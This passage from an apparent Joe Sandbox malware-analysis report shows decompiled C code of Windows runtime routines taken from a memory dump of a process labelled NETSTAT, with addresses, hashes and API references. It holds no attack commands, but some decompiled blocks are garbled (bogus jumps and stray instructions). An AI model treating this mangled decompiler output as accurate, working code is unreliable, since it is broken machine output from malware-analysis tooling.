										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E02EAB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E02EAB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E02EAE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E02EAA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x02e6b171
0x02e6b171
0x02e6b171
0x02e6b171
0x02e6b171
0x02e6b176
0x02e6b17b
0x02e6b180
0x02e6b186
0x02e6b18f
0x02e6b198
0x02e6b1a4
0x02e6b1aa
0x02ec4802
0x02ec4802
0x02ec4805
0x02ec480c
0x02ec480e
0x02e6b1d1
0x02e6b1d3
0x02e6b1de
0x02e6b1de
0x02ec4817
0x02ec481e
0x02ec4820
0x02ec4822
0x02ec4822
0x02ec4824
0x02ec4824
0x02ec482a
0x00000000
0x00000000
0x02ec4835
0x02ec483a
0x02ec483d
0x02ec483f
0x02ec4842
0x02ec4842
0x02ec4842
0x02ec4846
0x02ec484c
0x02ec484e
0x02ec4851
0x02ec4851
0x02ec4853
0x02ec4854
0x02ec4854
0x02ec4858
0x02ec485a
0x02ec485a
0x02ec485d
0x02ec485f
0x02ec4861
0x02ec4861
0x02ec4866
0x02ec486b
0x02ec486e
0x02ec4871
0x02ec4876
0x02ec4876
0x02ec4878
0x02ec487b
0x02ec4884
0x02ec4884
0x00000000
0x02ec487d
0x02ec487d
0x02ec4882
0x02ec4889
0x02ec4889
0x02ec488f
0x02ec4891
0x02ec48e0
0x02ec48e2
0x02ec48e4
0x02ec48e4
0x02ec48e7
0x02ec48e7
0x02ec48ed
0x02ec48f4
0x02ec48f6
0x02ec4951
0x02ec4951
0x02ec4953
0x02ec4953
0x02ec4956
0x02ec4956
0x02ec4958
0x02ec4959
0x02ec4959
0x02ec495d
0x02ec495d
0x02ec495f
0x02ec495f
0x02ec4965
0x02ec4969
0x02ec49ba
0x02ec49ba
0x02ec49c1
0x02ec49c5
0x02ec49cc
0x02ec49d4
0x02ec49d7
0x02ec49da
0x02ec49e4
0x02ec49e5
0x02ec49f3
0x02ec4a02
0x00000000
0x02ec4a02
0x02ec4972
0x02ec4974
0x00000000
0x00000000
0x02ec4976
0x02ec4979
0x02ec4982
0x02ec4983
0x02ec4984
0x02ec498b
0x02ec498d
0x02ec4991
0x02ec4993
0x02ec4999
0x02ec499d
0x02ec49a2
0x02ec49a2
0x02ec49a2
0x02ec4999
0x02ec49ac
0x00000000
0x02ec49b3
0x02ec48f8
0x02ec48fe
0x00000000
0x00000000
0x00000000
0x02ec48fe
0x02ec4895
0x02ec489c
0x02ec48ad
0x02ec48b2
0x02ec48b5
0x02ec48b7
0x02ec48ba
0x02ec48bc
0x02ec48c6
0x02ec48c6
0x02ec48cb
0x02ec48d1
0x02ec48d4
0x02ec48d8
0x02ec48d8
0x00000000
0x02ec48d8
0x02ec48be
0x02ec48c0
0x00000000
0x00000000
0x02ec48c2
0x00000000
0x00000000
0x00000000
0x02ec48c4
0x00000000
0x02ec4882
0x02ec487b
0x02ec4904
0x02ec4906
0x00000000
0x00000000
0x02ec4908
0x02ec490e
0x00000000
0x00000000
0x02ec4910
0x02ec4917
0x02ec4917
0x00000000
0x02ec4917
0x02e6b1ba
0x02ec47f9
0x02ec47fc
0x00000000
0x00000000
0x00000000
0x02ec47fc
0x02e6b1c0
0x02e6b1c0
0x02e6b1c3
0x02e6b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 02EC48AD

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 9094e8801da7411edff6e57791cd71051b296fb836564f02112ee4b9475a3cc0
Instruction ID: 73d0d6b910aec0423a827b660b30d26e5386a4cf824d15d8f63913eda41e7c82
Opcode Fuzzy Hash: 9094e8801da7411edff6e57791cd71051b296fb836564f02112ee4b9475a3cc0
Instruction Fuzzy Hash: 0851D771D442A98ADF35CFA4C9547BDBBB1BF04718F2091ADE8599B281D7704942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E8B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02E8B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x2f5d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E02E87D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E02F38CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E02EA9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E02EAB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E02EACE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E02E87D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E02F38F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E02EAAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x2f58628; // 0x0
								_v68 = _t77;
								_t78 =  *0x2f5862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x2f58628; // 0x0
							_t116 =  *0x2f5862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x02e8b94c
0x02e8b956
0x02e8b95c
0x02e8b95e
0x02e8b964
0x02e8b969
0x02e8b96d
0x02e8b96d
0x02e8b970
0x02e8b974
0x02e8b97a
0x02e8badf
0x02e8badf
0x02e8bae2
0x02e8bae4
0x02e8bae6
0x02e8baf0
0x02ed2cb8
0x02e8baf6
0x02e8baf6
0x02e8baf6
0x02e8bafd
0x02e8bb1f
0x02e8bb1f
0x02e8baff
0x02e8bb00
0x02e8bb00
0x02e8bb03
0x02e8bb03
0x02e8bacb
0x02e8bacf
0x02e8bad0
0x02e8bad1
0x02e8badc
0x02e8badc
0x02e8b980
0x02e8b980
0x02e8b988
0x02e8b98b
0x02e8b98d
0x02e8b990
0x02e8b993
0x02e8b999
0x02e8b99b
0x02e8b9a1
0x02e8b9a5
0x02e8b9aa
0x02e8b9b0
0x02e8b9bb
0x02e8b9c0
0x02e8b9c3
0x02e8b9ca
0x02e8b9cc
0x02e8b9cf
0x02e8b9d3
0x02e8b9d7
0x02e8ba94
0x02e8ba94
0x02e8ba98
0x02e8baa3
0x02ed2ccb
0x02e8baa9
0x02e8baa9
0x02e8baa9
0x02e8bab1
0x02ed2cd5
0x02ed2cdd
0x02ed2cdd
0x02e8babb
0x02e8babc
0x02e8bac2
0x02e8bac3
0x02e8bac3
0x02e8bac6
0x00000000
0x02e8b9dd
0x02e8b9dd
0x02e8b9e7
0x02e8b9e7
0x02e8b9ec
0x02e8b9ec
0x02e8b9f1
0x02e8b9f5
0x02e8b9fa
0x02e8ba00
0x02e8ba0c
0x02e8ba10
0x02e8ba10
0x02e8ba12
0x02e8ba18
0x00000000
0x00000000
0x02e8bb26
0x02e8bb26
0x02e8ba1e
0x02e8ba1e
0x02e8ba23
0x02e8ba25
0x02e8ba2c
0x02e8ba30
0x02e8ba35
0x02e8ba35
0x02e8ba41
0x02e8ba46
0x02e8ba4c
0x02e8ba50
0x02e8ba54
0x02e8ba6a
0x02e8ba6e
0x02e8ba70
0x02e8ba74
0x02e8ba78
0x02e8ba7a
0x02e8ba7c
0x02e8ba8e
0x02e8ba90
0x02e8ba92
0x02e8bb14
0x02e8bb14
0x02e8bb16
0x02e8bb16
0x00000000
0x02e8ba7c
0x02e8bb0a
0x02e8bb0d
0x00000000
0x00000000
0x00000000
0x02e8bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E8B9A5

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 4451c61eab96a7e7b9148203e0fa3355306763558bac279a12f52877ec74f2d9
Instruction ID: 7325043da8370f2bab5e4d7384700bb75518134e4d4dfde34a482b0d639140d6
Opcode Fuzzy Hash: 4451c61eab96a7e7b9148203e0fa3355306763558bac279a12f52877ec74f2d9
Instruction Fuzzy Hash: 34516971A48701CFC720EF28C490A2ABBE5BB88648F14996EF5D9C7344D770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02E92581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E02E92581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a1530200805, void* _a1546912485) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t232;
				signed int _t236;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				signed int _t274;
				signed int _t276;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				signed int _t294;
				signed int _t298;
				intOrPtr _t312;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				void* _t336;

				_t333 = _t335;
				_t336 = _t335 - 0x4c;
				_v8 =  *0x2f5d360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t328 = 0x2f5b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t274 = 0x48;
				_t308 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t321 = 0;
				_v37 = (_v24 >> 0x0000001c & 0x00000003) == 1;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L02E84620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t308 = _v32;
							 *(_t328 + 0x3c) = _t274;
							_t276 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t308;
							if(_t308 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t308 - 0x2f58478;
								 *_t328 = ((0 | _t308 == 0x02f58478) - 0x00000001 & 0xfffffffb) + 7;
								E02EAF3E0(_t323,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
								_t308 = _v32;
								_t336 = _t336 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t308 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E02EF39F2(_t323);
									_t308 = _v32;
									_t323 = _t268;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t274 = _t328 + _t276 * 4;
								_v56 = _t274;
								do {
									__eflags = _t308;
									if(_t308 != 0) {
										_t232 =  *(_v60 + _t289 * 4);
										__eflags = _t232;
										if(_t232 == 0) {
											goto L30;
										} else {
											__eflags = _t232 == 5;
											if(_t232 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t274 =  *(_v60 + _t289 * 4);
										 *(_t274 + 0x18) = _t323;
										_t236 =  *(_v60 + _t289 * 4);
										__eflags = _t236 - 8;
										if(_t236 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t236 * 4 +  &M02E92959))) {
												case 0:
													__ax =  *0x2f58488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E02EAF3E0(__edi,  *0x2f5848c, __ax & 0x0000ffff);
														__eax =  *0x2f58488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E02EAF3E0(_t323, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x2f58480 & 0x0000ffff = E02EAF3E0(__edi,  *0x2f58484,  *0x2f58480 & 0x0000ffff);
													__eax =  *0x2f58480 & 0x0000ffff;
													__eax = ( *0x2f58480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E02EAF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E02EAF3E0(_t323, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t336 = _t336 + 0xc;
													_t323 = _t323 + (_t263 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t323 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx = "\\Wow\\Wow";
													__eflags = __ebx - "\\Wow\\Wow";
													if(__ebx != "\\Wow\\Wow") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E02EAF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\Wow\\Wow";
														} while (__ebx != "\\Wow\\Wow");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x2f58478 & 0x0000ffff = E02EAF3E0(__edi,  *0x2f5847c,  *0x2f58478 & 0x0000ffff);
													__eax =  *0x2f58478 & 0x0000ffff;
													__eax = ( *0x2f58478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E02EF39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x2f56e58 & 0x0000ffff = E02EAF3E0(__edi,  *0x2f56e5c,  *0x2f56e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x2f56e58 & 0x0000ffff;
													__eax = ( *0x2f56e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t308 = _v32;
													L29:
													_t274 = _t274 + 4;
													__eflags = _t274;
													_v56 = _t274;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t236 =  *(_v60 + _t321 * 4);
						if(_t236 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t236 * 4 +  &M02E92935))) {
							case 0:
								__ax =  *0x2f58488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t308 =  &_v64;
								_v80 = E02E92E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x2f58480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2f58480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E02E7EEF0(0x2f579a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E02E7EB70(__ecx, 0x2f579a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t210 = _v72;
											__eflags = _t210;
											if(_t210 != 0) {
												L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t210);
											}
											_t211 = _v52;
											__eflags = _t211;
											if(_t211 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
													_t211 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x2f57b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E02E7EB70(__ecx, 0x2f579a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t333;
										_pop(_t275);
										return E02EAB640(_t211, _t275, _v8 ^ _t333, _t308, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t308 =  &_v36;
									_t272 = E02E92E3E(_t270,  &_v36);
									_t285 = _v36;
									_v76 = _t272;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x2f55764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x2f58478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2f58478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x2f56e58 & 0x0000ffff;
								__eax = ( *0x2f56e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t308 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					goto 0xec118f3e;
					asm("daa");
					goto 0xec0f5746;
					goto 0xec0f2e4e;
					asm("in eax, dx");
					asm("in eax, dx");
					asm("daa");
					goto 0xec11476a;
					goto 0xec108672;
					_t281 = 0x25;
					asm("in eax, dx");
					asm("in eax, dx");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x2f3ff00);
					E02EBD08C(_t281, _t323, _t328);
					_v44 =  *[fs:0x18];
					_t324 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t298 = _t245 * 0xc;
							_v48 = _t298;
							__eflags = _t282 -  *((intOrPtr*)(_t298 + 0x2e41664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E02EAE5C0(_a8,  *((intOrPtr*)(_t298 + 0x2e41668)), _t282);
									_t336 = _t336 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t331 = E02EE51BE(_t282,  *((intOrPtr*)(_v48 + 0x2e4166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t294 = _a4;
								__eflags = _t294;
								if(_t294 != 0) {
									_v36 = _t294;
									__eflags =  *_t294 - _t324;
									if( *_t294 == _t324) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t312 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t312 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t294;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t294) {
											__eflags =  *(_t312 + 0x1c);
											if( *(_t312 + 0x1c) == 0) {
												L106:
												_t331 = E02E92AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t324 = 1;
													_t294 = _v36;
													goto L75;
												}
											} else {
												_t250 = E02E76600( *(_t312 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t294 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E02E92C50(_t294, _a8, _t282, _a16, _a20, _a24, _t324);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t257 = E02E92AE4( &_v36, _a8, _t282, _a16, _a20, _t331);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E02E92C50(_v36, _a8, _t282, _a16, _a20, _t331, 1);
									}
									_v8 = _t324;
									E02E92ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t331;
					}
					L70:
					return E02EBD0D1(_t243);
				}
				L108:
			}

0x02e92584
0x02e92586
0x02e92590
0x02e92596
0x02e92597
